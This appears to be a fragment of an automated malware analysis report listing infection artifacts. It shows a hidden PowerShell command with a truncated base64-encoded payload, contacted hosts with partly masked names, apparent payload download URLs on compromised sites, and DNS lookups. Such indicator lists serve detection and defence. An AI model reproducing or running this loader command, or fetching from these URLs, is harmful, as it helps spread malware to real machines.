Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABKAGoAeQBvAHgAagByAHUAcQBjAGsAagA9ACcASABpAHMAYgBqAG0AZQB1AGQAZwBmAGwAJwA7ACQAUAB6AGgAdQBhAGwAbwBnAG4AagBiAHcAbAAgAD0AIAAnADgAMQAwACcAOwAkAEEAZgBpAGgAZwBqAGk...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1484
- %TEMP%\1036626.cvr
- '1n##ah.net':80
- 'de###s-roth.de':80
- 'lu####ttours.com':443
- http://1n##ah.net/wp-content/FCzQHilE/
- http://www.1n##ah.net/wp-content/FCzQHilE/
- http://de###s-roth.de/phpmaill/nvub-2hfx8k0-3184595/
- 'lu####ttours.com':443
- DNS ASK co###ltinghd.ge
- DNS ASK sp###traders.ch
- DNS ASK 1n##ah.net
- DNS ASK de###s-roth.de
- DNS ASK lu####ttours.com